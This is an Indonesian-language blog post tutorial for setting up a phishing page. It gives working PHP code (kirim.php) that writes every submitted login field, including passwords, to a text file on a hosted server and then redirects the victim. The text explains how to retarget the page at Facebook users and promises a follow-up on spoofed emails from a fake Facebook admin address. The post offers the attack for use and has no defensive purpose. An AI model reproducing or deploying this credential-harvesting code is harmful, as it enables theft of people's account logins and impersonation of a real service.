Phising Script

Hmm ini dia langkah selanjut nya setelah anda membaca Mengenal Phising ,   langkah selanjut nya adalah kita membuat Fake Login...langsung a...


Hmm ini dia langkah selanjut nya setelah anda membaca Mengenal Phising,   langkah selanjut nya adalah kita membuat Fake Login...langsung aja deh gw buatin script nya

nih liat baik baik.....

  1. Buat lah Script bernama index.php (berisi login form dan me redirect ke kirim.php)

login

pass


Download Index.php

Setelah anda download.... lihat pada bagian form action nya...
saya menggunakan http://h1.ripway.com/hitbreaker/phising/kirim.php karena saya menaruh file kirim.php nya di ripway......


okeh..beres deh untuk login form nya...

sekarang kita buat proses nya....


2. Membuat file kirim.php
 <?php
header ('Location:  http://h1.ripway.com/hitbreaker/phising/passwords.txt ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle) ;
exit;
?>



Penjelasan dari script di atas...

fungsi dari headerlocation adalah me redirect/memanggil halaman yg di tuju....

jadi di dalam file kirim.php ini merupakan proses input data ke passwords.txt...

jadi msalkan kamu mau phising facebook..tinggal di rubah saja header location nya menjadi link login facebook berada....



okeh beres semua peralatan untuk phising nya.....

tutorial selanjut nya adalah fake email..
ex: facebook..
maka kita akan membuat email mengatas namakan admin facebook/admin@facebook.com

tunggu jam tayang nya aja yah... ^ ^

COMMENTS

Nama

Android,2,Arduino,1,cibinong,1,curhat,29,Download Movie,4,Download Music,1,Download Script,2,Download software dan Tools,1,etrading,1,experiment,1,fotografi,2,Free Templates,1,Hot News,10,iklan baris,1,investasi,1,Jualan,5,Kesehatan,8,lokomedia,1,love quote,1,My Project,1,Nema 17,1,Nema 23,1,Otomotif,2,Perbankan,2,property,1,quote,1,saham,1,Samsung,1,Sport,3,Stepper Motor Unipolar / Bipolar,1,Tahukah kamu,13,Tips dan trick,12,Website CMS,2,
ltr
item
FJPlastik: Phising Script
Phising Script
http://t2.gstatic.com/images?q=tbn:ANd9GcQZvttLiBD2_-owCYqKnz3NZjzWwMGhHG_oX_tyGwQfUlyUPsPO
FJPlastik
https://fjplastik.blogspot.com/2010/12/phising-script.html
https://fjplastik.blogspot.com/
http://fjplastik.blogspot.com/
http://fjplastik.blogspot.com/2010/12/phising-script.html
true
347850165439542325
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy